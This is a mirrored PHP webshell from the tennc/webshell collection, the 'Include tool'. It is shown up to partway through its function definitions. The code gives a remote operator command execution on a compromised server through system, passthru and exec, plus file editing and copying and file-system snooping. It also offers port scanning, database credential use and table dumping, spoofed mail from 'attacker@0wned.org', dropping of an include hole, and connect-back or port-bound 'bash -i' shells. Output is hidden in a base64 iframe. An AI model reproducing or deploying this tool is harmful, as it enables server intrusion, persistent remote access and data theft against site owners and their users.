mirror of
https://github.com/tennc/webshell
synced 2024-11-10 05:44:11 +00:00
1312 lines
46 KiB
Text
1312 lines
46 KiB
Text
<?php
|
|
######################################################################
|
|
# we decide if we want syslogging
|
|
closelog();
|
|
######################################################################
|
|
# define variables
|
|
######################################################################
|
|
|
|
# error_reporting(E_ALL);
|
|
error_reporting(0);
|
|
|
|
# get globals even if register_globals is off
|
|
import_globals();
|
|
|
|
$safe_mode = ini_get('safe_mode');
|
|
$register_globals = ini_get('register_globals');
|
|
$magic_quotes_gpc = ini_get('magic_quotes_gpc');
|
|
$txt['en']['on']="on";
|
|
$txt['en']['off']="off";
|
|
$txt['de']['on']="an";
|
|
$txt['de']['off']="aus";
|
|
$lang="en";
|
|
|
|
if($safe_mode == 1) $SM = $txt[$lang]['on'];
|
|
else {
|
|
$SM = $txt[$lang]['off'];
|
|
# set_time_limit(9000);
|
|
}
|
|
if($register_globals == 1) $RG = $txt[$lang]['on'];
|
|
else $RG = $txt[$lang]['off'];
|
|
if($magic_quotes_gpc == 1) $MQ = $txt[$lang]['on'];
|
|
else $MQ = $txt[$lang]['off'];
|
|
|
|
# navigatable functions
|
|
$ArrFuncs = array(
|
|
"dropinc" => 0,
|
|
"filecopy" => 0,
|
|
"fileedit" => 0,
|
|
"showsource" => 0,
|
|
"snoop" => 0,
|
|
"cmdln" => 0,
|
|
"connectback" => 0,
|
|
"phpshell" => 0,
|
|
"servicecheck" => 0,
|
|
"mysqlaccess" => 0,
|
|
"mail" => 0,
|
|
"env" => 0,
|
|
"phpenv" => 0,
|
|
"phpinfo" => 0,
|
|
"dumpvars" => 0,
|
|
"debugscript" => 0,
|
|
"syslog" => 0
|
|
);
|
|
|
|
# init navigation
|
|
foreach($ArrFuncs as $key => $val) if(!isset($$key)) $$key = $val;
|
|
|
|
|
|
|
|
# set default values
|
|
$ArrDefaults = array(
|
|
"filecopy_source" => "http://...",
|
|
"filecopy_dest" => getcwd(),
|
|
"cmdcall" => "",
|
|
"editfile" => getcwd(),
|
|
"editcontent" => "",
|
|
"chdir" => ".",
|
|
"vsource" => $SCRIPT_FILENAME,
|
|
"mail_from" => "attacker@0wned.org",
|
|
"mail_to" => "",
|
|
"mail_subject" => "",
|
|
"mail_attach_source" => "http://....",
|
|
"mail_attach_appear" => "filename...",
|
|
"mail_content_type" => "image/png",
|
|
"mail_msg" => "",
|
|
"tcpports" => "21 22 23 25 80 110",
|
|
"timeout" => 5,
|
|
"miniinc_loc" => getcwd() . "/miniinc.php",
|
|
"incdbhost" => "localhost",
|
|
"cbhost" => $_SERVER['REMOTE_ADDR'],
|
|
"cbport" => 20202,
|
|
"cbtempdir" => "/tmp",
|
|
"cbcompiler" => "gcc",
|
|
"phpshellapp" => "export TERM=xterm; bash -i",
|
|
"phpshellhost" => "0.0.0.0",
|
|
"phpshellport" => "20202"
|
|
);
|
|
|
|
# init defaults
|
|
foreach($ArrDefaults as $key => $val) if(!isset($$key)) $$key = $val;
|
|
|
|
# define executable functions
|
|
$Mstr = array(
|
|
0 => "No execute functions available!",
|
|
1 => "passthru()",
|
|
2 => "system()",
|
|
3 => "backticks",
|
|
4 => "proc_open()",
|
|
5 => "exec()"
|
|
);
|
|
|
|
# clean request to avoid uri monster
|
|
$SREQ = "";
|
|
$reqdat = array();
|
|
$tmpCount=0;
|
|
foreach($REQUESTS as $key => $val){
|
|
if($tmpCount==0) $reqdat[] = $key."=".$val;
|
|
else if($val!=0 || $val!="" || $val!="0") $reqdat[] = $key."=".$val;
|
|
$tmpCount++;
|
|
}
|
|
$SREQ = implode("&", $reqdat);
|
|
$tmpCount=0;
|
|
if($SREQ=="") {
|
|
$tmp_req = array();
|
|
$tmp_qry = explode("&", $QUERY_STRING);
|
|
foreach($tmp_qry as $key => $val) {
|
|
$tmp_val = explode("=", $val);
|
|
if($tmpCount==0) $tmp_req[] = $tmp_val[0]."=".$tmp_val[1];
|
|
else if($tmp_val[1]!=0 || $tmp_val[1]!="" || $tmp_val[1]!="0") $tmp_req[] = $tmp_val[0]."=".$tmp_val[1];
|
|
$tmpCount++;
|
|
}
|
|
$SREQ = implode("&", $tmp_req);
|
|
}
|
|
|
|
if(isset($path['docroot'])) $SREQ .= "&path[docroot]=" . $path['docroot'];
|
|
|
|
# set some defaults to avaoid errors
|
|
$is_file = array();
|
|
$is_dir = array();
|
|
$is_w_dir = array();
|
|
$is_w_file = array();
|
|
$emeth=0;
|
|
if($chdir!="/" && strlen($chdir) < 2) $chdir = getcwd() . "/";
|
|
$chdir = str_replace("//", "/", $chdir);
|
|
if(substr($chdir, -1) != "/") $chdir .= "/";
|
|
##
|
|
# Setup wether to use PHP_SELF or SCRIPT_NAME
|
|
if($PHP_SELF!=$SCRIPT_NAME) $MyLoc = $PHP_SELF;
|
|
else $MyLoc = $SCRIPT_NAME;
|
|
|
|
# $MyLoc = "http://" . $_SERVER['HTTP_HOST'] . $MyLoc;
|
|
$MyLoc = "http://" . $SERVER_NAME . ":" . $SERVER_PORT . $MyLoc;
|
|
|
|
# This is a list of internal inc.inc vars that do not get displayed
|
|
# inside the dumpvars function (poss for a debug func later?)
|
|
$DebugArr = array(
|
|
'ARHGFDGFGASDFG',
|
|
'safe_mode',
|
|
'register_globals',
|
|
'magic_quotes_gpc',
|
|
'txt',
|
|
'lang',
|
|
'SM',
|
|
'RG',
|
|
'MQ',
|
|
'ArrFuncs',
|
|
'val',
|
|
'key',
|
|
'env',
|
|
'phpenv',
|
|
'phpinfo',
|
|
'debugscript',
|
|
'filecopy',
|
|
'fileedit',
|
|
'showsource',
|
|
'snoop',
|
|
'mail',
|
|
'cmdln',
|
|
'syslog',
|
|
'servicecheck',
|
|
'dropinc',
|
|
'mysqlaccess',
|
|
'ArrDefaults',
|
|
'filecopy_source',
|
|
'filecopy_dest',
|
|
'cmdcall',
|
|
'editfile',
|
|
'editcontent',
|
|
'chdir',
|
|
'vsource',
|
|
'mail_from',
|
|
'mail_to',
|
|
'mail_subject',
|
|
'mail_attach_source',
|
|
'mail_attach_appear',
|
|
'mail_content_type',
|
|
'mail_msg',
|
|
'tcpports',
|
|
'timeout',
|
|
'miniinc_loc',
|
|
'incdbhost',
|
|
'Mstr',
|
|
'SREQ',
|
|
'reqdat',
|
|
'tmpCount',
|
|
'is_file',
|
|
'is_dir',
|
|
'is_w_dir',
|
|
'is_w_file',
|
|
'emeth',
|
|
'MyLoc',
|
|
'dumpvarsare',
|
|
'DebugArr',
|
|
'cbtempdir',
|
|
'cbcompiler',
|
|
'cbhost',
|
|
'cbport',
|
|
'phpshelltype',
|
|
'phpshellapp',
|
|
'phpshellhost',
|
|
'phpshellport'
|
|
);
|
|
|
|
|
|
# activate syslog entry
|
|
if($syslog == 1)
|
|
{
|
|
# openlog("# XSS $SCRIPT_URI #", LOG_PID | LOG_PERROR, LOG_LOCAL0);
|
|
# drop_syslog_warning("Q: $QUERY_STRING :: R: $REMOTE_ADDR ($HTTP_USER_AGENT)");
|
|
}
|
|
###############################################################################
|
|
#
|
|
# start include output
|
|
#
|
|
###############################################################################
|
|
$strOutput = "";
|
|
$strOutput .= "<html><body bgcolor='#ffffff'>
|
|
<table border=3 bgcolor=#aaaaaa width='100%'><tr><td><font color='#000000'>
|
|
<center>
|
|
<h2>Include tool</h2>
|
|
PHP Version: " . phpversion() . " |
|
|
safe_mode: $SM |
|
|
register_globals: $RG |
|
|
magic_quotes_gpc: $MQ |
|
|
syslogging: ";
|
|
if($syslog == 1) $strOutput .= $txt[$lang]['off']; else $strOutput .= $txt[$lang]['on'];
|
|
$strOutput .= "
|
|
<br><br>
|
|
</center>
|
|
<font color='#000000'>";
|
|
foreach($ArrFuncs as $key => $val) $strOutput .= make_switch($key);
|
|
|
|
###############################################################################
|
|
# test cmd shell environment
|
|
###############################################################################
|
|
if($env == 1) {
|
|
$strOutput .= "
|
|
<table border=1><tr><td colspan=2><h3>cmd infos</h3></td></tr>
|
|
<tr><td>test using pwd</td><td>"; $emeth =& test_cmd_shell(); $strOutput .= "</td></tr>";
|
|
if($emeth==0) {
|
|
$strOutput .= "<tr><td colspan=2>$Mstr[$emeth]</td></tr>";
|
|
} else {
|
|
$strOutput .= "<tr><td>exec method</td><td>$Mstr[$emeth]</td><tr>
|
|
<tr><td>uname -a</td><td>" . Mexec("uname -a", $emeth) . "</td><tr>
|
|
<tr><td>id</td><td>" . Mexec("id", $emeth) . "</td><tr>
|
|
</table>";
|
|
}
|
|
}
|
|
|
|
###############################################################################
|
|
# test php environment
|
|
###############################################################################
|
|
if($phpenv == 1) {
|
|
$strOutput .= "<table border=1><tr><td colspan=2><h3>php short infos</h3></td></tr>
|
|
<tr><td colspan=2>posix infos</td><tr>";
|
|
if(function_exists('posix_uname')) {
|
|
$posix_uname = posix_uname();
|
|
while (list($info, $value) = each ($posix_uname)) {
|
|
$strOutput .= "<tr><td>$info</td><td>$value</td></tr>";
|
|
}
|
|
} else {
|
|
$strOutput .= "posix_uname not available";
|
|
}
|
|
$strOutput .= "<tr><td>current script user</td><td>" . get_current_user() . "</td><tr>";
|
|
if(function_exists('posix_getuid')) $strOutput .= "<tr><td>getuid</td><td>" . posix_getuid() . "</td><tr>";
|
|
else $strOutput .= "posix_getuid not available";
|
|
if(function_exists('posix_geteuid')) $strOutput .= "<tr><td>geteuid</td><td>" . posix_geteuid() . "</td><tr>";
|
|
else $strOutput .= "posix_geteuid not available";
|
|
if(function_exists('posix_getgid')) $strOutput .= "<tr><td>getgid</td><td>" . posix_getgid() . "</td><tr>";
|
|
else $strOutput .= "posix_getgid not available";
|
|
$strOutput .= "</table>";
|
|
}
|
|
|
|
|
|
###############################################################################
|
|
# dump variables
|
|
###############################################################################
|
|
if($dumpvars == 1) {
|
|
$strOutput .= "<table border=1><tr><td><h3>dump variables</h3></td></tr>
|
|
<tr><td>" . dd("GLOBALS") . "</td></tr>
|
|
</table>";
|
|
}
|
|
###############################################################################
|
|
# dump variables (DEBUG SCRIPT) NEEDS MODIFINY FOR B64 STATUS!!
|
|
###############################################################################
|
|
if($debugscript == 1) { ?>
|
|
<table border=1><tr><td><h3>debug script</h3></td></tr>
|
|
<tr><td>
|
|
<? ddb("DebugArr"); ?>
|
|
</td></tr>
|
|
</table>
|
|
<? }
|
|
###############################################################################
|
|
# copy file
|
|
###############################################################################
|
|
if($filecopy == 1) {
|
|
$strOutput .= "<table border=1><tr><td colspan=2><h3>copy file</h3></td></tr>
|
|
<form method='post' target='_parent' action=" . $MyLoc . "?" . $SREQ . "&'>
|
|
<tr><td>source</td><td><input type=text name='filecopy_source' value='" . $filecopy_source . "'></td></tr>
|
|
<tr><td>destination</td><td><input type=text name='filecopy_dest' value='" . $filecopy_dest . "'></td></tr>
|
|
<tr><td></td><td><input type=submit></td></tr>
|
|
<tr><td colspan=2>" . copy_file($filecopy_source,$filecopy_dest) . "</td></tr>
|
|
</form>
|
|
</table>";
|
|
}
|
|
###############################################################################
|
|
# edit file
|
|
###############################################################################
|
|
if($fileedit == 1) {
|
|
$strOutput .= "<table border=1><tr><td colspan=2><h3>edit file</h3></td></tr>
|
|
<form method='post' target='_parent' action='" . $MyLoc . "?" . $SREQ . "&'>
|
|
<tr><td>file</td><td><input type=text name='editfile' value='" . $editfile . "'></td></tr>
|
|
<tr><td>edit</td><td><input type='checkbox' name='edit' value='1'></td></tr>
|
|
<tr><td>content</td><td><textarea name='editcontent' cols='50' rows='10'>";
|
|
if($edit==1 | $editfile!=$ArrDefaults['editfile'])
|
|
$strOutput .= show_file($editfile);
|
|
$strOutput .= "</textarea></td></tr>
|
|
<tr><td></td><td><input type=submit></td></tr>
|
|
<tr><td colspan=2>";
|
|
if($edit==1 | $editfile!=$ArrDefaults['editfile'])
|
|
$strOutput .= edit_file($editcontent,$editfile,$edit);
|
|
$strOutput .= "</td></tr>
|
|
</table>
|
|
</form>";
|
|
}
|
|
###############################################################################
|
|
# execute cmd shell NEEDS MODIFINY FOR B64 STATUS!!
|
|
###############################################################################
|
|
if($cmdln == 1) {
|
|
$emeth = test_cmd_shell();
|
|
$strOutput .= "<table border=1><tr><td colspan=2><h3>execute cmd execution: " . $cmdcall . "</h3></td></tr>
|
|
<form method='post' target='_parent' action='" . $MyLoc . "?" . $SREQ . "&'>
|
|
<tr><td>cmd line</td><td><input type=text name='cmdcall' value='" . $cmdcall . "'></td></tr>
|
|
<tr><td></td><td><input type=submit></td></tr>
|
|
<tr><td>test method with 'pwd'</td><td>" . $Mstr[$emeth] . "</td></tr>
|
|
<tr><td colspan=2>";
|
|
if($emeth < 3) {
|
|
$strOutput .= "The output of this command will be somewhere on the page!";
|
|
Mexec($cmdcall, $emeth);
|
|
} else {
|
|
$strOutput .= Mexec($cmdcall, $emeth);
|
|
}
|
|
$strOutput .= "</td></tr>
|
|
</form>
|
|
</table>";
|
|
}
|
|
###############################################################################
|
|
# sending mime mail
|
|
###############################################################################
|
|
if($mail == 1) {
|
|
$strOutput .= "<table border=1><tr><td colspan=2><h3>sending mime mail with attachment</h3></td></tr>
|
|
<form method='post' target='_parent' action='" . $MyLoc . "?" . $SREQ . "&'>
|
|
<tr><td>from</td><td><input type=text name='mail_from' value='" . $mail_from . "'></td></tr>
|
|
<tr><td>to</td><td><input type=text name='mail_to' value='" . $mail_to . "'></td></tr>
|
|
<tr><td>subject</td><td><input type=text name='mail_subject' value='" . $mail_subject . "'></td></tr>
|
|
<tr><td>message</td><td><textarea name='mail_msg' cols='50' rows='10'>" . $mail_msg . "</textarea></td></tr>
|
|
<tr><td>attach file</td><td><input type=text name='mail_attach_source' value='" .$mail_attach_source . "'></td></tr>
|
|
<tr><td>attach content type</td><td><input type=text name='mail_content_type' value='" . $mail_content_type . "'></td></tr>
|
|
<tr><td>file to appear</td><td><input type=text name='mail_attach_appear' value='" . $mail_attach_appear . "'></td></tr>
|
|
<tr><td></td><td><input type=submit></td></tr>
|
|
<tr><td colspan=2>" . drop_mime_mail($mail_from,$mail_to,$mail_subject,$mail_attach_source,$mail_content_type,$mail_attach_appear,$mail_msg) . "</td></tr>
|
|
</form>
|
|
</table>";
|
|
}
|
|
|
|
###############################################################################
|
|
# drop mini inc handling
|
|
###############################################################################
|
|
if($dropinc == 1) {
|
|
if($loc!="") $miniinc_loc = $loc;
|
|
$strOutput .= "<table border=1><tr><td colspan=2><h3>drop mini inc hole</h3></td></tr>
|
|
<form method='post' target='_parent' action='" . $MyLoc . "?" . $SREQ . "&'>
|
|
<tr><td>source</td><td><input type=text name='loc' value='" . $miniinc_loc . "'></td></tr>
|
|
<tr><td>drop</td><td><input type='checkbox' name='minisave' value='1'></td></tr>
|
|
<tr><td></td><td><input type=submit></td></tr>
|
|
<tr><td colspan=2><pre>";
|
|
if($minisave==1) $strOutput .= dropminiinc($miniinc_loc);
|
|
$strOutput .= "</pre></td></tr>
|
|
</form>
|
|
</table>";
|
|
}
|
|
###############################################################################
|
|
# connect C back shell handling
|
|
###############################################################################
|
|
if($connectback == 1) {
|
|
$strOutput .= "<table border=1><tr><td colspan=2><h3>connect back shell</h3></td></tr>
|
|
<form method='post' target='_parent' action='" . $MyLoc . "?" . $SREQ . "&'>
|
|
<tr><td>temp dir.</td><td><input type=text name='cbtempdir' value='" . $cbtempdir . "'></td></tr>
|
|
<tr><td>compiler</td><td><input type=text name='cbcompiler' value='" . $cbcompiler . "'></td></tr>
|
|
<tr><td>host</td><td><input type=text name='cbhost' value='" . $cbhost . "'></td></tr>
|
|
<tr><td>tcp port</td><td><input type=text name='cbport' value='" . $cbport . "'></td></tr>
|
|
<tr><td>execute</td><td><input type='checkbox' name='run' value='1'></td></tr>
|
|
<tr><td></td><td><input type=submit></td></tr>
|
|
<tr><td colspan=2>";
|
|
if($run == 1 && $cbtempdir && $cbcompiler && $cbhost && $cbport) $strOutput .= connect_back($cbtempdir, $cbcompiler, $cbhost, $cbport);
|
|
$strOutput .= "</td></tr></form></table>";
|
|
}
|
|
|
|
###############################################################################
|
|
# PHP shell handling
|
|
###############################################################################
|
|
if($phpshell == 1) {
|
|
$strOutput .= "<table border=1><tr><td colspan=2><h3>PHP shell</h3></td></tr>
|
|
<form method='post' target='_parent' action='" . $MyLoc . "?" . $SREQ . "&'>
|
|
<tr><td>type</td><td><select name='phpshelltype'><option value='cb'>Connect Back</option><option value='pb'>Port Binding</option></select></td></tr>
|
|
<tr><td>shell app</td><td><input type=text name='phpshellapp' value='" . $phpshellapp . "'></td></tr>
|
|
<tr><td>host</td><td><input type=text name='phpshellhost' value='" . $phpshellhost . "'></td></tr>
|
|
<tr><td>tcp port</td><td><input type=text name='phpshellport' value='" . $phpshellport . "'></td></tr>
|
|
<tr><td>execute</td><td><input type='checkbox' name='run' value='1'></td></tr>
|
|
<tr><td></td><td><input type=submit></td></tr>
|
|
<tr><td colspan=2>";
|
|
if($run == 1 && $phpshellapp && $phpshellhost && $phpshellport) $strOutput .= DB_Shell($phpshelltype, $phpshellapp, $phpshellport, $phpshellhost);
|
|
$strOutput .= "</td></tr></form></table>";
|
|
}
|
|
|
|
|
|
###############################################################################
|
|
# snooping
|
|
###############################################################################
|
|
if($snoop == 1) {
|
|
$strOutput .= "<table border=1><tr><td colspan=2><h3>file system snooping: " . $chdir . "</h3></td></tr>
|
|
<form method='post' target='_parent' action='" . $MyLoc . "?" . $SREQ . "&'>
|
|
<tr><td>path</td><td><input type=text name='chdir' value='" . $chdir . "'></td></tr>
|
|
<tr><td colspan=2>" . snoopy($chdir) . "</td></tr>
|
|
</form>
|
|
</table>";
|
|
}
|
|
###############################################################################
|
|
# show highlited source
|
|
###############################################################################
|
|
if(($showsource == 1) | ($vsource!=$ArrDefaults['vsource'])) {
|
|
$strOutput .= "<table border=1><tr><td colspan=2><h3>show source: " . $vsource . "</h3></td></tr>
|
|
<form method='post' target='_parent' action='" . $MyLoc . "?" . $SREQ . "&'>
|
|
<tr><td>path</td><td><input type=text name='vsource' value='" . $vsource . "'></td></tr>
|
|
<tr><td></td><td><input type=submit></td></tr>
|
|
<tr><td colspan=2>" . highlight_file($vsource, 1) . "</td></tr>
|
|
</form>
|
|
</table>";
|
|
}
|
|
###############################################################################
|
|
# service check
|
|
###############################################################################
|
|
if($servicecheck == 1) {
|
|
if($servhost!="") $host = $servhost;
|
|
else $host = "localhost";
|
|
|
|
$strOutput .= "<table border=1><tr><td colspan=2><h3>simple service check</h3></td></tr>
|
|
<form method='post' target='_parent' action='" . $MyLoc . "?" . $SREQ . "&'>
|
|
<tr><td>host(s)</td><td><input type=text name='servhost' value='" . $host . "'></td></tr>
|
|
<tr><td>tcp port(s)</td><td><input type=text name='tcpports' value='" . $tcpports . "'></td></tr>
|
|
<tr><td>timeout</td><td><input type=text name='timeout' value='" . $timeout . "'></td></tr>
|
|
<!-- tr><td>udp port(s)</td><td><input type=text name='udpports' value='<?=$sports?>'></td></tr -->
|
|
<tr><td></td><td><input type=submit></td></tr>
|
|
<tr><td colspan=2><pre>";
|
|
|
|
$hosts = explode(" ", $host);
|
|
$port = explode(" ",$tcpports);
|
|
$values = count($port);
|
|
$numhosts = count($hosts);
|
|
if($values == 1 && $port[0] != "") $strOutput .= "\nChecking 1 port..\n";
|
|
else if($values > 1) $strOutput .= "Checking $values ports..\n";
|
|
else $strOutput .= "No ports specified!!\n";
|
|
if($numhosts > 1) $strOutput .= "On $numhosts hosts..\n";
|
|
else if($numhosts == 1) $strOutput .= "On 1 host..\n";
|
|
else $strOutput .= "No hosts specified!!\n";
|
|
if($numhosts >= 1) {
|
|
for($hcount=0; $hcount < $numhosts; $hcount++) {
|
|
$tmphost = $hosts[$hcount];
|
|
$strOutput .= "\nTesting $tmphost..\n";
|
|
if(($values == 1 && $port[0] != "") | $values > 1) {
|
|
for ($cont=0; $cont < $values; $cont++) {
|
|
@$sock[$cont] = fsockopen($tmphost, $port[$cont], $oi, $oi2, $timeout);
|
|
$service = getservbyport($port[$cont],"tcp");
|
|
@$get = fgets($sock[$cont]);
|
|
if(isset($get)) $strOutput .= "Port: $port[$cont] ($service) - Banner: $get \n";
|
|
flush();
|
|
}
|
|
}
|
|
}
|
|
}
|
|
$strOutput .= "</pre></td></tr>
|
|
</form>
|
|
</table>";
|
|
}
|
|
###############################################################################
|
|
# show phpinfo
|
|
###############################################################################
|
|
if($phpinfo == 1){
|
|
phpinfo();
|
|
}
|
|
######################################################################
|
|
# db stuff
|
|
######################################################################
|
|
if($mysqlaccess == 1) {
|
|
$strOutput .= "<table border=1>
|
|
<form method='post' target='_parent' action='$MyLoc?$SREQ&'>
|
|
<tr><td>db host</td><td><input type='text' name='incdbhost' size='10' value='$incdbhost'/></td></tr>
|
|
<tr><td>user</td><td><input type='text' name='incdbuser' size='10' value='$incdbuser'/></td></tr>
|
|
<tr><td>pass</td><td><input type='text' name='incdbpass' size='10' value='$incdbpass'/></td></tr>
|
|
<tr><td>name</td><td><input type='text' name='incdbname' size='10' value='$incdbname'/></td></tr>
|
|
<tr><td>table</td><td><input type='text' name='incdbtable' size='10' value='$incdbtable'/></td></td></tr>
|
|
<tr><td>sql query</td><td><input type='text' name='incdbsql' size='50' value='$incdbsql'/></td></td></tr>
|
|
<tr><td>dumpfile</td><td><input type='text' name='incdbfile' size='10' value='$incdbfile'/></td></td></tr>
|
|
<!-- tr><td>Variables?</td><td><input type='checkbox' name='incdbvar'<? if($incdbvar!='') echo ' checked '; /></td></tr -->
|
|
<tr><td colspan=2><input type='submit' name='submit' value='Query'/></td></tr>
|
|
</table>";
|
|
}
|
|
|
|
if($incdbhost!="" && $incdbuser!="") {
|
|
if($incdbvar!="") $dbh = $incdbhost;
|
|
else $dbH = $incdbhost;
|
|
$dbu = $incdbuser;
|
|
$dbp = $incdbpass;
|
|
if($incdbsql!="") $dbs = $incdbsql;
|
|
if($incdbname!="") $dbn = $incdbname;
|
|
if($incdbtable!="") $dbt = $incdbtable;
|
|
if($incdbfile!="") $dumpfile = $incdbfile;
|
|
}
|
|
|
|
if(isset($dbh)) {
|
|
$strOutput .= "<table border=1><tr><td><b>mysql access</b></td></tr>";
|
|
eval("\$Gdbhost = \"\$$dbh\";");
|
|
eval("\$Gdbuser = \"\$$dbu\";");
|
|
eval("\$Gdbpass = \"\$$dbp\";");
|
|
eval("\$Gdbname = \"\$$dbn\";");
|
|
$strOutput .= "<tr><td>";
|
|
if($dbn=="") {
|
|
$strOutput .= "host=".$Gdbhost." user=".$Gdbuser." pass=".$Gdbpass .
|
|
"</td></tr><tr><td>" .
|
|
display_dbs($Gdbhost, $Gdbuser, $Gdbpass);
|
|
} else if(isset($dbs)) {
|
|
$Gdbsql = $dbs;
|
|
$strOutput .= "host=".$Gdbhost." user=".$Gdbuser." pass=".$Gdbpass." name=".$Gdbname."<br/>sql=".$Gdbsql .
|
|
"</td></tr><tr><td>";
|
|
if(isset($dumpfile)) {
|
|
$strOutput .= dump_query($Gdbhost, $Gdbuser, $Gdbpass, $Gdbname, $Gdbsql, $dumpfile);
|
|
} else {
|
|
$strOutput .= display_query($Gdbhost, $Gdbuser, $Gdbpass, $Gdbname, $Gdbsql);
|
|
}
|
|
} else if(isset($dbt)) {
|
|
$Gdbtabl = $dbt;
|
|
$strOutput .= "host=".$Gdbhost." user=".$Gdbuser." pass=".$Gdbpass." name=".$Gdbname." table=".$Gdbtabl;
|
|
if($dumpfile!="") $strOutput .= " dumpfile=" .$dumpfile;
|
|
$strOutput .= "</td></tr><tr><td>";
|
|
if(isset($dumpfile)) {
|
|
$strOutput .= dump_rows($Gdbhost, $Gdbuser, $Gdbpass, $Gdbname, $Gdbtabl, $dumpfile);
|
|
} else {
|
|
$strOutput .= display_rows($Gdbhost, $Gdbuser, $Gdbpass, $Gdbname, $Gdbtabl);
|
|
}
|
|
} else {
|
|
$strOutput .= "host=".$Gdbhost." user=".$Gdbuser." pass=".$Gdbpass." name=".$Gdbname .
|
|
"</td></tr><tr><td>" .
|
|
display_tables($Gdbhost, $Gdbuser, $Gdbpass, $Gdbname);
|
|
}
|
|
$strOutput .= "</pre></td></tr></table><br/>";
|
|
}
|
|
|
|
if(isset($dbH)) {
|
|
$strOutput .= "<table border=1><tr><td><b>mysql access</b></td></tr><tr><td>";
|
|
if($dbn=="") {
|
|
$strOutput .= "host=".$dbH." user=".$dbu." pass=".$dbp.
|
|
"</td></tr><tr><td>".
|
|
display_dbs($dbH, $dbu, $dbp);
|
|
} else if(isset($dbs)) {
|
|
$strOutput .= "host=".$dbH." user=".$dbu." pass=".$dbp." name=".$dbn."<br/>sql=".$dbs.
|
|
"</td></tr><tr><td>";
|
|
if(isset($dumpfile)) {
|
|
$strOutput .= dump_query($dbH, $dbu, $dbp, $dbn, $dbs, $dumpfile);
|
|
} else {
|
|
$strOutput .= display_query($dbH, $dbu, $dbp, $dbn, $dbs);
|
|
}
|
|
} else if(isset($dbt)) {
|
|
$strOutput .= "host=".$dbH." user=".$dbu." pass=".$dbp." name=".$dbn." table=".$dbt;
|
|
if($dumpfile!="") $strOutput .= " dumpfile=" .$dumpfile;
|
|
$strOutput .= "</td></tr><tr><td> ";
|
|
if(isset($dumpfile)) {
|
|
$strOutput .= dump_rows($dbH, $dbu, $dbp, $dbn, $dbt, $dumpfile);
|
|
} else {
|
|
$strOutput .= display_rows($dbH, $dbu, $dbp, $dbn, $dbt);
|
|
}
|
|
} else {
|
|
$strOutput .= "host=".$dbH." user=".$dbu." pass=".$dbp." name=".$dbn .
|
|
"</td></tr><tr><td>" .
|
|
display_tables($dbH, $dbu, $dbp, $dbn);
|
|
}
|
|
$strOutput .= "</pre></td></tr></table><br/>";
|
|
}
|
|
|
|
if(isset($Odbh)) {
|
|
$strOutput .= "<table border=1><tr><td><b>odbc access</b></td></tr>";
|
|
eval("\$Gdbhost = \"\$$Odbh\";");
|
|
eval("\$Gdbuser = \"\$$dbu\";");
|
|
eval("\$Gdbpass = \"\$$dbp\";");
|
|
eval("\$Gdbname = \"\$$dbn\";");
|
|
$strOutput .= "<tr><td>";
|
|
if(isset($dbt)) {
|
|
$Gdbtabl = $dbt;
|
|
$strOutput .= "host=".$Gdbhost." user=".$Gdbuser." pass=".$Gdbpass." name=".$Gdbname." table=".$Gdbtabl .
|
|
"</td></tr><tr><td>" .
|
|
display_rows($Gdbhost, $Gdbuser, $Gdbpass, $Gdbname, $Gdbtabl);
|
|
} else {
|
|
$strOutput .= "host=".$Gdbhost." user=".$Gdbuser." pass=".$Gdbpass .
|
|
"</td></tr><tr><td> " .
|
|
Odisplay_tables($Gdbhost, $Gdbuser, $Gdbpass);
|
|
}
|
|
$strOutput .= "</pre></td></tr></table><br/>";
|
|
}
|
|
|
|
if(isset($OdbH)) {
|
|
$strOutput .= "<table border=1><tr><td><b>odbc access</b></td></tr><tr><td>";
|
|
if(isset($dbt)) {
|
|
$strOutput .= "host=".$dbH." user=".$dbu." pass=".$dbp." name=".$dbn." table=".$dbt .
|
|
"</td></tr><tr><td> " .
|
|
Odisplay_rows($OdbH, $dbu, $dbp, $dbn, $dbt);
|
|
} else {
|
|
$strOutput .= "host=".$dbH." user=".$dbu." pass=".$dbp .
|
|
"</td></tr><tr><td> " .
|
|
Odisplay_tables($OdbH, $dbu, $dbp);
|
|
}
|
|
$strOutput .= "</pre></td></tr></table><br/>";
|
|
}
|
|
|
|
|
|
$strOutput .= "</font></td></tr></table>";
|
|
$strOutputB64 = chunk_split(base64_encode($strOutput));
|
|
echo "</div></div></div></div></div></div></div></div></div></div>\n";
|
|
echo '<iframe width="100%" height="100%" style="border:0; position: absolute; left: 0px; top: 0px;" src="data:text/html;base64,' . $strOutputB64 .'">';
|
|
|
|
######################################################################
|
|
#
|
|
# functions
|
|
#
|
|
######################################################################
|
|
# make globals avail
|
|
function import_globals()
|
|
{
|
|
global $HTTP_SERVER_VARS;
|
|
global $REMOTE_ADDR;
|
|
global $PHP_SELF;
|
|
global $REQUESTS;
|
|
global $SCRIPT_FILENAME;
|
|
global $QUERY_STRING;
|
|
global $SCRIPT_URI;
|
|
global $SERVER_NAME;
|
|
$_igr = ini_get('register_globals');
|
|
if ($_igr == '' OR $_igr == 'Off' OR $_igr == 0) import_request_variables('GPC');
|
|
if (phpversion() <= '4.1.0') {
|
|
$REQUESTS = array_merge($HTTP_GET_VARS, $HTTP_POST_VARS);
|
|
} else {
|
|
$REQUESTS = $_REQUEST;
|
|
}
|
|
if($_SERVER['PHP_SELF']=="") {
|
|
$SERVER_NAME = $HTTP_SERVER_VARS['SERVER_NAME'];
|
|
$SCRIPT_URI = $HTTP_SERVER_VARS['SCRIPT_URI'];
|
|
$REMOTE_ADDR = $HTTP_SERVER_VARS['REMOTE_ADDR'];
|
|
$QUERY_STRING = $HTTP_SERVER_VARS['QUERY_STRING'];
|
|
$PHP_SELF = $HTTP_SERVER_VARS['PHP_SELF'];
|
|
$SCRIPT_FILENAME = $HTTP_SERVER_VARS['SCRIPT_FILENAME'];
|
|
} else {
|
|
$SERVER_NAME = $_SERVER['SERVER_NAME'];
|
|
$SCRIPT_URI = $_SERVER['SCRIPT_URI'];
|
|
$REMOTE_ADDR = $_SERVER['REMOTE_ADDR'];
|
|
$QUERY_STRING = $_SERVER['QUERY_STRING'];
|
|
$PHP_SELF = $_SERVER['PHP_SELF'];
|
|
$SCRIPT_FILENAME = $_SERVER['SCRIPT_FILENAME'];
|
|
}
|
|
}
|
|
|
|
function dd($v) {
|
|
global $DebugArr;
|
|
$rv = "<blockquote>\n";
|
|
$q="while(list(\$key,\$val) = each(\$$v)) {".
|
|
' if(array_search($key, $DebugArr)) {'.
|
|
' } else if((is_array($val)) && ($key!="GLOBALS")) {'.
|
|
' echo "<b>$key</b>>><br/>";'.
|
|
' @dd($v."[".$key."]");'.
|
|
' } else if($key=="GLOBALS") {'.
|
|
